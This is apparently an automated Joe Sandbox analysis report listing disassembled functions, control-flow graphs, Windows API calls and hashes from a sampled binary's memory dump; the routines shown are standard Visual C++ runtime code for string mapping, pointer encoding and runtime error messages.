                                                                          control_flow_graph 180 a6070-a608f 181 a60c9-a60cc 180->181 182 a6091-a60aa LCMapStringW 180->182 185 a60ce-a60d1 181->185 186 a60f0-a60f8 181->186 183 a60ac-a60b2 182->183 184 a60b4-a60bd GetLastError 182->184 183->181 184->181 187 a60bf 184->187 188 a60d4-a60d7 185->188 189 a62aa-a62b3 186->189 190 a60fe-a6100 186->190 187->181 193 a60d9-a60dc 188->193 194 a60e1-a60ea 188->194 191 a62bd-a62c0 189->191 192 a62b5-a62ba 189->192 190->189 195 a6106-a6109 190->195 196 a62ca-a62d9 call a6b1a 191->196 197 a62c2-a62c7 191->197 192->191 193->188 198 a60de 193->198 199 a60ec 194->199 200 a60ed 194->200 201 a62db-a62dd 195->201 202 a610f-a6115 195->202 196->201 213 a62e2-a62e5 196->213 197->196 198->194 199->200 200->186 206 a6403-a640c 201->206 203 a611f-a6146 MultiByteToWideChar 202->203 204 a6117-a611c 202->204 203->201 207 a614c 203->207 204->203 208 a640e call a10cc 206->208 210 a614e-a6158 207->210 211 a6191 207->211 212 a6413-a6414 208->212 210->211 215 a615a-a6163 210->215 214 a6194-a6197 211->214 216 a62eb-a6305 call a6b63 213->216 217 a63c6-a63de LCMapStringA 213->217 214->201 218 a619d-a61b0 MultiByteToWideChar 214->218 219 a6178 215->219 220 a6165-a616e call a6aa0 215->220 216->201 236 a6307-a6320 LCMapStringA 216->236 221 a63e0-a63e3 217->221 223 a6299-a62a5 call a5446 218->223 224 a61b6-a61d1 LCMapStringW 218->224 228 a6179 call a54b5 219->228 240 a618c-a618f 220->240 241 a6170-a6176 220->241 226 a63ee-a63f3 221->226 227 a63e5-a63ed call a35ee 221->227 223->206 224->223 230 a61d7-a61de 224->230 234 a6401 226->234 235 a63f5-a63f8 226->235 227->226 233 a617e-a6181 228->233 238 a6209-a620b 230->238 239 a61e0-a61e3 230->239 233->240 243 a6183 233->243 234->206 235->234 244 a63fa-a6400 call a35ee 235->244 245 a6329 236->245 246 a6322-a6324 236->246 249 a620d-a6217 238->249 250 a6252 238->250 239->223 248 a61e9-a61ec 239->248 240->214 251 a6189 241->251 243->251 244->234 253 a632b-a632e 245->253 254 a6368 245->254 246->221 248->223 257 a61f2-a6204 LCMapStringW 248->257 249->250 258 a6219-a6222 249->258 256 a6254-a6256 250->256 251->240 253->254 255 a6330-a6338 253->255 259 a636a-a636c 254->259 261 a633a-a6343 call a6aa0 255->261 262 a6350 255->262 256->223 263 a6258-a626e LCMapStringW 256->263 257->223 264 a623a 258->264 265 a6224-a622d call a6aa0 258->265 259->246 266 a636e-a6392 call a5320 LCMapStringA 259->266 261->246 284 a6345-a634e 261->284 268 a6351 call a54b5 262->268 269 a6292-a6298 call a5446 263->269 270 a6270-a6275 263->270 273 a623b call a54b5 264->273 265->223 289 a622f-a6238 265->289 290 a6398-a63ba call a6b63 266->290 291 a6394-a6396 266->291 276 a6356-a6359 268->276 269->223 277 a627b-a627e 270->277 278 a6277-a6279 270->278 274 a6240-a6243 273->274 282 a624e-a6250 274->282 283 a6245-a624b 274->283 285 a635b-a6361 276->285 286 a6364-a6366 276->286 287 a6281-a628f WideCharToMultiByte 277->287 278->287 282->256 283->282 284->259 285->286 286->259 287->269 289->256 292 a63bd-a63c4 call a5446 290->292 291->292 292->221
                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(00000000,00000100,000A926C,00000001,00000000,00000000,00000100,?,00000000,?,?,?,?,?,?,00000000), ref: 000A60A2
                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,00000000), ref: 000A60B4
                                                                          • MultiByteToWideChar.KERNEL32(00000100,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,?,00000000), ref: 000A6140
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000), ref: 000A61AC
                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,00000000), ref: 000A61C8
                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?,?,00000000,?,?), ref: 000A6202
                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?,?,00000000,?,?), ref: 000A6266
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,?), ref: 000A6289
                                                                          • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,00000100,?,00000000,?,?,?,?), ref: 000A6319
                                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000100,?,00000000,?), ref: 000A638B
                                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,00000100,?,00000000,?,?,?,?,?,?,00000000), ref: 000A63D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1775797328-0
                                                                          • Opcode ID: eedc8ba276708b36142dffdbae3119f10a1677f640c2de0d1c8162f799f92d7f
                                                                          • Instruction ID: 635eeedd4b43ff5076390af6a73ba57da32ec4dc2fcb14f1805a5085f17430c0
                                                                          • Opcode Fuzzy Hash: eedc8ba276708b36142dffdbae3119f10a1677f640c2de0d1c8162f799f92d7f
                                                                          • Instruction Fuzzy Hash: 9BB1AB72800519EFDF619FE0CC80DEE7BB5FB4A314F188529FA05A6161D7368DA1DBA0
                                                                          Function 000A3213 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 297 a3213-a3230 call a20f0 300 a3236-a3245 LoadLibraryA 297->300 301 a32c4-a32cb 297->301 304 a324b-a325b GetProcAddress 300->304 305 a3375 300->305 302 a331c-a3323 301->302 303 a32cd-a32d3 301->303 306 a3355-a3363 call a20f9 302->306 307 a3325-a332e call a20f9 302->307 303->302 308 a32d5-a32ee call a20f9 * 2 303->308 304->305 309 a3261-a32ae call a207e GetProcAddress call a207e GetProcAddress call a207e GetProcAddress call a207e 304->309 310 a3377-a337b 305->310 306->305 320 a3365-a3373 306->320 307->306 321 a3330-a3337 307->321 308->302 326 a32f0-a32f2 308->326 309->301 340 a32b0-a32bf GetProcAddress call a207e 309->340 320->310 321->306 329 a3339-a3340 321->329 326->302 330 a32f4-a32f8 326->330 329->306 332 a3342-a334b call a20f9 329->332 338 a32fa-a330b 330->338 339 a3313-a331a 330->339 332->306 341 a334d-a3352 332->341 338->339 346 a330d-a3311 338->346 339->306 340->301 341->306 346->302 346->339
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(USER32.DLL,000AAFA8,00000000,00000314,?,000A1888,000AAFA8,Microsoft Visual C++ Runtime Library), ref: 000A323B
                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 000A3257
                                                                            • Part of subcall function 000A207E: TlsGetValue.KERNEL32(00000000,?,000A20F7,00000000,000A3223,000AAFA8,00000000,00000314,?,000A1888,000AAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000A2090
                                                                            • Part of subcall function 000A207E: TlsGetValue.KERNEL32(00000005,?,000A20F7,00000000,000A3223,000AAFA8,00000000,00000314,?,000A1888,000AAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000A20A7
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 000A3274
                                                                            • Part of subcall function 000A207E: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,000A20F7,00000000,000A3223,000AAFA8,00000000,00000314,?,000A1888,000AAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000A20BD
                                                                            • Part of subcall function 000A207E: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 000A20D8
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 000A3289
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 000A329E
                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 000A32B6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$Value$HandleLibraryLoadModule
                                                                          • String ID: GetProcessWindowStation$MessageBoxA$USER32.DLL
                                                                          • API String ID: 2739679353-2247880650
                                                                          • Opcode ID: 3f9839db97c82171b0cf678e0290477fc92b7c1b6a569932c0048a524d742a52
                                                                          • Instruction ID: 5118b4a1ae308bb4fe7d4b46b420a026205691f39ff9c250fed12a02e117ccd0
                                                                          • Opcode Fuzzy Hash: 3f9839db97c82171b0cf678e0290477fc92b7c1b6a569932c0048a524d742a52
                                                                          • Instruction Fuzzy Hash: 8A41B172905605AAEF60AFF99D09E6E7BE99B03350B14052AF501D2163EF7DCB80DB20
                                                                          Function 000A1719 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 161fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 347 a1719-a172a 348 a172d-a1734 347->348 349 a173f-a1742 348->349 350 a1736-a173d 348->350 351 a1748-a1753 call a35a3 349->351 352 a18bf-a18c3 349->352 350->348 350->349 355 a1759-a1763 call a35a3 351->355 356 a188d-a1899 GetStdHandle 351->356 362 a1772-a1778 355->362 363 a1765-a176c 355->363 356->352 357 a189b-a189e 356->357 357->352 359 a18a0-a18b9 call a34b0 WriteFile 357->359 359->352 362->352 365 a177e-a1799 call a353b 362->365 363->356 363->362 368 a179b-a17a5 call a2ae2 365->368 369 a17a8-a17c4 GetModuleFileNameA 365->369 368->369 371 a17ec-a17f7 call a34b0 369->371 372 a17c6-a17db call a353b 369->372 379 a17f9-a181e call a34b0 call a33f0 371->379 380 a1831 371->380 372->371 378 a17dd-a17e9 call a2ae2 372->378 378->371 379->380 392 a1820-a182f call a2ae2 379->392 381 a1833-a1844 call a337c 380->381 390 a1853-a1869 call a337c 381->390 391 a1846-a1850 call a2ae2 381->391 399 a186b-a1875 call a2ae2 390->399 400 a1878-a188b call a3213 390->400 391->390 392->381 399->400 400->352
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,000AAFC1,00000104), ref: 000A17BC
                                                                          • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,000A10F6,?), ref: 000A188F
                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,000A10F6,?), ref: 000A18B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandleModuleNameWrite
                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                          • API String ID: 3784150691-4022980321
                                                                          • Opcode ID: 00e1bd78e97fc6b479658fdfe37e067ea615a6d3e49702bb93a90b289fd49935
                                                                          • Instruction ID: 5bcc2cb619023f8c6dbccd9a62009b27c521f8bedf6ad1ea2f3e2ad9f2b2222f
                                                                          • Opcode Fuzzy Hash: 00e1bd78e97fc6b479658fdfe37e067ea615a6d3e49702bb93a90b289fd49935
                                                                          • Instruction Fuzzy Hash: 044106B2A0421036EA6166E89C46FEF36DC9B23790F140234FD05951D3FF69CA0182F2
                                                                          Function 000A21E5 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 57libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,000A9458,0000000C,000A2320,00000000,00000000,?,000A174F,00000003,?,?,?,?,?,?,000A10F6), ref: 000A21F7
                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 000A222B
                                                                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 000A223B
                                                                          • InterlockedIncrement.KERNEL32(000AA4D8), ref: 000A226A
                                                                            • Part of subcall function 000A13E1: Sleep.KERNEL32(000003E8,00000000,?,000A2148,KERNEL32.DLL,?,000A2194,?,000A174F,00000003), ref: 000A13ED
                                                                            • Part of subcall function 000A13E1: GetModuleHandleW.KERNEL32(?,?,000A2148,KERNEL32.DLL,?,000A2194,?,000A174F,00000003,?,?,?,?,?,?,000A10F6), ref: 000A13F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc$IncrementInterlockedSleep
                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                          • API String ID: 3998264955-2843748187
                                                                          • Opcode ID: dfff4d89d32238de543e1ea468f17412cb3febe71a37e83015b1f6a50ac718c0
                                                                          • Instruction ID: 72af735ec715e9be1dd6a8f080dce886df7dc99b90e87e1427e1ebe95dd473a2
                                                                          • Opcode Fuzzy Hash: dfff4d89d32238de543e1ea468f17412cb3febe71a37e83015b1f6a50ac718c0
                                                                          • Instruction Fuzzy Hash: 1F11E471940B00AFE760EFF9D805B9EBBE0AF56310F108529E499976A1CF789A40CF21
                                                                          Function 000A3D2D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 428 a3d2d-a3d38 429 a3d3e-a3d51 InterlockedDecrement 428->429 430 a3dc1-a3dc5 428->430 431 a3d53-a3d54 InterlockedDecrement 429->431 432 a3d56-a3d5e 429->432 431->432 433 a3d63-a3d6b 432->433 434 a3d60-a3d61 InterlockedDecrement 432->434 435 a3d6d-a3d6e InterlockedDecrement 433->435 436 a3d70-a3d78 433->436 434->433 435->436 437 a3d7a-a3d7b InterlockedDecrement 436->437 438 a3d7d-a3d80 436->438 437->438 439 a3d87-a3d8e 438->439 440 a3d99-a3d9d 439->440 441 a3d90-a3d94 439->441 443 a3da9-a3daf 440->443 444 a3d9f-a3da4 440->444 441->440 442 a3d96-a3d97 InterlockedDecrement 441->442 442->440 443->439 445 a3db1-a3dc0 InterlockedDecrement 443->445 444->443 446 a3da6-a3da7 InterlockedDecrement 444->446 445->430 446->443
                                                                          APIs
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000A3D47
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000A3D54
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000A3D61
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000A3D6E
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000A3D7B
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000A3D97
                                                                          • InterlockedDecrement.KERNEL32(00000000), ref: 000A3DA7
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 000A3DBD
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: DecrementInterlocked
                                                                          • String ID:
                                                                          • API String ID: 3448037634-0
                                                                          • Opcode ID: 027437acf294803276ab06dc30e9d63f17aabb03e0a31b552cefd2d8432e0a3d
                                                                          • Instruction ID: 294c0a2ee2462a3dadb5f4e45a176a1b3b05769f7619adf445401121ddf6ee4a
                                                                          • Opcode Fuzzy Hash: 027437acf294803276ab06dc30e9d63f17aabb03e0a31b552cefd2d8432e0a3d
                                                                          • Instruction Fuzzy Hash: 4E111E75B00719E7DB609FB9EC84B56BBECAF42784F084416B508D7140DB74EA04CBA1
                                                                          Function 000A3C9E Relevance: 12.1, APIs: 8, Instructions: 58COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 447 a3c9e-a3cba InterlockedIncrement 448 a3cbf-a3cc7 447->448 449 a3cbc-a3cbd InterlockedIncrement 447->449 450 a3cc9-a3cca InterlockedIncrement 448->450 451 a3ccc-a3cd4 448->451 449->448 450->451 452 a3cd9-a3ce1 451->452 453 a3cd6-a3cd7 InterlockedIncrement 451->453 454 a3ce3-a3ce4 InterlockedIncrement 452->454 455 a3ce6-a3ce9 452->455 453->452 454->455 456 a3cf0-a3cf7 455->456 457 a3cf9-a3cfd 456->457 458 a3d02-a3d06 456->458 457->458 459 a3cff-a3d00 InterlockedIncrement 457->459 460 a3d08-a3d0d 458->460 461 a3d12-a3d18 458->461 459->458 460->461 462 a3d0f-a3d10 InterlockedIncrement 460->462 461->456 463 a3d1a-a3d2c InterlockedIncrement 461->463 462->461
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000A3CB0
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000A3CBD
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000A3CCA
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000A3CD7
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000A3CE4
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000A3D00
                                                                          • InterlockedIncrement.KERNEL32(00000000), ref: 000A3D10
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 000A3D26
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: IncrementInterlocked
                                                                          • String ID:
                                                                          • API String ID: 3508698243-0
                                                                          • Opcode ID: a44c06ee0e3ef0219132aba7c87577c0068bb05cb95e580bd75d086b969e0edb
                                                                          • Instruction ID: ecce09cc77783ec65444a39e34d4dfa190b97c6d35846e56ee066089bac94698
                                                                          • Opcode Fuzzy Hash: a44c06ee0e3ef0219132aba7c87577c0068bb05cb95e580bd75d086b969e0edb
                                                                          • Instruction Fuzzy Hash: 0C111B71B00315A7DB549FA9EC84B56BBECBF42794F088416B808D7141DB74EA14CBA1
                                                                          Function 000A6B63 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 464 a6b63-a6b9d 465 a6d02 464->465 466 a6ba3-a6bb8 GetCPInfo 464->466 467 a6d05-a6d0e 465->467 468 a6bba-a6bbe 466->468 469 a6c18-a6c2b MultiByteToWideChar 466->469 470 a6d10 call a10cc 467->470 468->469 473 a6bc0-a6bcb GetCPInfo 468->473 471 a6c2d-a6c2f 469->471 472 a6bf0 469->472 476 a6d15-a6d16 470->476 471->467 474 a6c4d 472->474 475 a6bf2-a6bf8 472->475 473->469 477 a6bcd-a6bd1 473->477 478 a6c50-a6c53 474->478 475->474 479 a6bfa-a6c03 475->479 477->469 480 a6bd3-a6be0 477->480 478->471 481 a6c55-a6c78 call a5320 MultiByteToWideChar 478->481 482 a6c34 479->482 483 a6c05-a6c0e call a6aa0 479->483 484 a6bee 480->484 485 a6be2-a6bed call a34b0 480->485 494 a6c7a-a6c7f 481->494 495 a6cf9-a6d01 call a5446 481->495 488 a6c35 call a54b5 482->488 496 a6c48-a6c4b 483->496 497 a6c10-a6c16 483->497 484->472 485->484 493 a6c3a-a6c3d 488->493 493->496 498 a6c3f 493->498 500 a6c9e-a6ca7 494->500 501 a6c81-a6c97 WideCharToMultiByte 494->501 495->465 496->478 502 a6c45 497->502 498->502 505 a6ca9-a6cbb WideCharToMultiByte 500->505 506 a6cbd-a6ccc call a3730 500->506 501->495 504 a6c99-a6c9c 501->504 502->496 504->495 505->495 505->506 506->495 509 a6cce-a6cde WideCharToMultiByte 506->509 510 a6cee-a6cf2 509->510 511 a6ce0-a6cec call a35ee 509->511 510->495 513 a6cf4-a6cf7 510->513 511->495 513->495
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,000A6012,00000000,?,?,?,?,?), ref: 000A6BAE
                                                                          • GetCPInfo.KERNEL32(?,00000001,?,?,?,?,000A6012,00000000,?), ref: 000A6BC7
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,000A6012,00000000,00000000,?,?,?,?,000A6012,00000000,?,?,?,?), ref: 000A6C25
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,000A6012,?,00000000,?,?,?,?,?,?,?,000A6012,00000000,?), ref: 000A6C74
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,000A6012), ref: 000A6C8F
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,000A6012), ref: 000A6CB5
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,000A6012), ref: 000A6CDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$Info
                                                                          • String ID:
                                                                          • API String ID: 1775632426-0
                                                                          • Opcode ID: c3809068b699c5121e67d2a4153b8e586a3fdaab384c4ca726a15f2a19f070f8
                                                                          • Instruction ID: 3839a3288169793376d0f247329b7d657bce2c9297c661683a523d74959f096a
                                                                          • Opcode Fuzzy Hash: c3809068b699c5121e67d2a4153b8e586a3fdaab384c4ca726a15f2a19f070f8
                                                                          • Instruction Fuzzy Hash: 39517831D00219AFCF619FE9DC44DEEBBF9EB8A360F284129F955A6150D7369D40CBA0
                                                                          Function 000A207E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 515 a207e-a2094 TlsGetValue 516 a2096-a209e 515->516 517 a20b7-a20c5 GetModuleHandleW 515->517 516->517 520 a20a0-a20ad TlsGetValue 516->520 518 a20d2-a20d8 GetProcAddress 517->518 519 a20c7-a20d0 call a13e1 517->519 522 a20de-a20e0 518->522 519->518 525 a20ea-a20ef 519->525 520->517 527 a20af-a20b5 520->527 522->525 526 a20e2-a20e7 522->526 526->525 527->522
                                                                          APIs
                                                                          • TlsGetValue.KERNEL32(00000000,?,000A20F7,00000000,000A3223,000AAFA8,00000000,00000314,?,000A1888,000AAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000A2090
                                                                          • TlsGetValue.KERNEL32(00000005,?,000A20F7,00000000,000A3223,000AAFA8,00000000,00000314,?,000A1888,000AAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000A20A7
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,000A20F7,00000000,000A3223,000AAFA8,00000000,00000314,?,000A1888,000AAFA8,Microsoft Visual C++ Runtime Library,00012010), ref: 000A20BD
                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 000A20D8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: Value$AddressHandleModuleProc
                                                                          • String ID: EncodePointer$KERNEL32.DLL
                                                                          • API String ID: 1929421221-3682587211
                                                                          • Opcode ID: ca3517cdd67ba27dcffb3335ee780963a083dcee3b2bcda017657c1b44b8f000
                                                                          • Instruction ID: 7610ae14323fd6161fc046b48fded561f624cf4d7fc258ae98db8c5addf0f40f
                                                                          • Opcode Fuzzy Hash: ca3517cdd67ba27dcffb3335ee780963a083dcee3b2bcda017657c1b44b8f000
                                                                          • Instruction Fuzzy Hash: EBF0C231200905AB9BB16BE9EC44DAA3FD8AF033607148130F918D65B2DF38CD82CBA1
                                                                          Function 000A20F9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • TlsGetValue.KERNEL32(00000000,?,000A2194,?,000A174F,00000003,?,?,?,?,?,?,000A10F6,?), ref: 000A210B
                                                                          • TlsGetValue.KERNEL32(00000005,?,000A2194,?,000A174F,00000003,?,?,?,?,?,?,000A10F6,?), ref: 000A2122
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,000A2194,?,000A174F,00000003,?,?,?,?,?,?,000A10F6,?), ref: 000A2138
                                                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 000A2153
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
